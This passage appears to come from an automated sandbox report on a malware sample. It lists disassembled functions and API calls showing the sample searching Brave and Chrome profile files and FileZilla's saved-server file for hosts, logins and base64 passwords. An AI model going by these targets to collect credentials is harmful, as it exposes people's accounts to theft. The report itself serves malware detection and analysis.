                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0070E0E7
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E11F
                          • lstrlen.KERNEL32(010DCD40), ref: 0070E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0070E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E19F
                          • lstrcat.KERNEL32(00000000), ref: 0070E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E1F9
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E22F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E261
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 0070E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0070E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0070E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E349
                          • DeleteFileA.KERNEL32(?), ref: 0070E381
                          • StrCmpCA.SHLWAPI(?,010DCDA0), ref: 0070E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E445
                          • StrCmpCA.SHLWAPI(?,010D8830), ref: 0070E468
                          • StrCmpCA.SHLWAPI(?,010D8B70), ref: 0070E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0070E4E0
                          • StrCmpCA.SHLWAPI(?,010DCD70), ref: 0070E58E
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0070E776
                          • DeleteFileA.KERNEL32(?), ref: 0070E7D2
                          • StrCmpCA.SHLWAPI(?,010D89E0), ref: 0070E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 83a87d8582eb21cce0002fc6928fd4c647fd783616970245499d2c3330d8d217
                          • Instruction ID: a3818bfdcb7cbc1715a5923ea24640c05dd63dfe5e418570d92afbe45091f2f4
                          • Opcode Fuzzy Hash: 83a87d8582eb21cce0002fc6928fd4c647fd783616970245499d2c3330d8d217
                          • Instruction Fuzzy Hash: 47925371A14216DBDB21EFB8DC8DAAE77F9AF44300F044624F845A7291DB78ED458F90
                          Function 007118A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007118D2
                          • lstrlen.KERNEL32(\*.*), ref: 007118DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007118FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0071190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00711947
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 00711967
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711981
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007119BF
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007119F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711A4C
                          • lstrlen.KERNEL32(00731794), ref: 00711A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711A80
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711AB4
                          • lstrlen.KERNEL32(?), ref: 00711AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00711AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B19
                          • lstrlen.KERNEL32(010D88C0), ref: 00711B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711B8F
                          • lstrlen.KERNEL32(00731794), ref: 00711BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711BC3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C57
                          • lstrlen.KERNEL32(00731794), ref: 00711C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711C8B
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D21
                          • lstrlen.KERNEL32(00731794), ref: 00711D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D55
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00711DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711DED
                          • lstrlen.KERNEL32(00731794), ref: 00711E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711E36
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711E68
                          • lstrlen.KERNEL32(010DCC50), ref: 00711E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711EB2
                          • lstrlen.KERNEL32(00731794), ref: 00711EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711EE3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F15
                          • lstrlen.KERNEL32(010DD4E8), ref: 00711F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F5F
                          • lstrlen.KERNEL32(00731794), ref: 00711F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711F90
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711FC2
                          • lstrlen.KERNEL32(010CB248), ref: 00711FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712036
                          • lstrlen.KERNEL32(00731794), ref: 00712048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712067
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00712073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712098
                          • lstrlen.KERNEL32(?), ref: 007120AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007120D0
                          • lstrcat.KERNEL32(00000000,?), ref: 007120DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712103
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071213F
                          • lstrlen.KERNEL32(010DCD40), ref: 0071214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00712176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 0e49b1759b5bacc297f113d484c0bf54e1e96523cdb6d84b7a6e73af77e5f1b0
                          • Instruction ID: 271d2336bed3127649df72dcd4be920ed3a675c60a1950adabeb05ea820e03a0
                          • Opcode Fuzzy Hash: 0e49b1759b5bacc297f113d484c0bf54e1e96523cdb6d84b7a6e73af77e5f1b0
                          • Instruction Fuzzy Hash: 9662B271A25616DBCB21AF68DC8CAEF77B9AF40700F444224F905A7292DB3CDD46DB90
                          Function 00713910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0071392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00713943
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071396C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00713986
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007139BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007139E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007139F2
                          • lstrlen.KERNEL32(00731794), ref: 007139FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A1A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713A26
                          • lstrlen.KERNEL32(?), ref: 00713A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00713A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713A8A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00713ACE
                          • lstrlen.KERNEL32(?), ref: 00713AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B36
                          • lstrlen.KERNEL32(00731794), ref: 00713B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B6A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713B9E
                          • lstrlen.KERNEL32(?), ref: 00713BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00713BE0
                          • lstrlen.KERNEL32(010D89A0), ref: 00713C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713C3C
                          • lstrlen.KERNEL32(010D88C0), ref: 00713C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713CB7
                          • lstrlen.KERNEL32(00731794), ref: 00713CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713CE8
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713D79
                          • lstrlen.KERNEL32(00731794), ref: 00713D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713DAD
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E43
                          • lstrlen.KERNEL32(00731794), ref: 00713E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713E77
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00713EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F0D
                          • lstrlen.KERNEL32(00731794), ref: 00713F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F41
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00713F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713F75
                          • lstrlen.KERNEL32(?), ref: 00713F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00713FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00713FE0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071401F
                          • lstrlen.KERNEL32(010DCD40), ref: 0071402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007140CE
                          • lstrcat.KERNEL32(00000000), ref: 007140DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 007142D9
                          • FindClose.KERNEL32(00000000), ref: 007142E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 1b6fc118085c477aa08ea0719d40f2c083ec91aa4283cd35e0391d833c389c4f
                          • Instruction ID: 3d2cd1fc99a56fd901686f2ea4967f23ee9d22c62129639cc6f1f6bf6a6e2c07
                          • Opcode Fuzzy Hash: 1b6fc118085c477aa08ea0719d40f2c083ec91aa4283cd35e0391d833c389c4f
                          • Instruction Fuzzy Hash: 65625272A25616DBCB21AF68DC4DAEE77B9AF44700F044224F805A7291DB7CED46CF90
                          Function 00716960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007169C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00716A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00716A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00716AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00716B35
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716B9D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 046bcff23b65af9447e7033866daef3154e0d3f93f777a0395f32440f83c01ec
                          • Instruction ID: f1aad82061c48a7940ffde0aee762171267fd4443e1e81e722beb4b516485b24
                          • Opcode Fuzzy Hash: 046bcff23b65af9447e7033866daef3154e0d3f93f777a0395f32440f83c01ec
                          • Instruction Fuzzy Hash: 2242A571A29215EBCB11ABB8DC8DBAE77B9AF04700F044514F801E72D2DB7CD946DBA0
                          Function 0070DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DBEF
                          • lstrlen.KERNEL32(00734CA8), ref: 0070DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC17
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 0070DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC4C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DC8F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0070DCD0
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0070DCF0
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0070DD0A
                          • lstrlen.KERNEL32(0072CFEC), ref: 0070DD1D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DD7B
                          • lstrlen.KERNEL32(00731794), ref: 0070DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDA3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DDAF
                          • lstrlen.KERNEL32(?), ref: 0070DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0070DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DE19
                          • lstrlen.KERNEL32(00731794), ref: 0070DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DE6F
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DE7B
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DEBB
                          • lstrlen.KERNEL32(00731794), ref: 0070DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DEE6
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DEF2
                          • lstrlen.KERNEL32(010D8830), ref: 0070DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFA5
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DFB1
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DFF4
                          • lstrlen.KERNEL32(00731794), ref: 0070DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E022
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070E02E
                          • lstrlen.KERNEL32(010D8830), ref: 0070E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0070E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0070E0E7
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E11F
                          • lstrlen.KERNEL32(010DCD40), ref: 0070E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0070E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E19F
                          • lstrcat.KERNEL32(00000000), ref: 0070E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0070E1F9
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070E22F
                          • lstrlen.KERNEL32(010D89A0), ref: 0070E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E261
                          • lstrcat.KERNEL32(00000000,010D89A0), ref: 0070E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0070E988
                          • FindClose.KERNEL32(00000000), ref: 0070E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
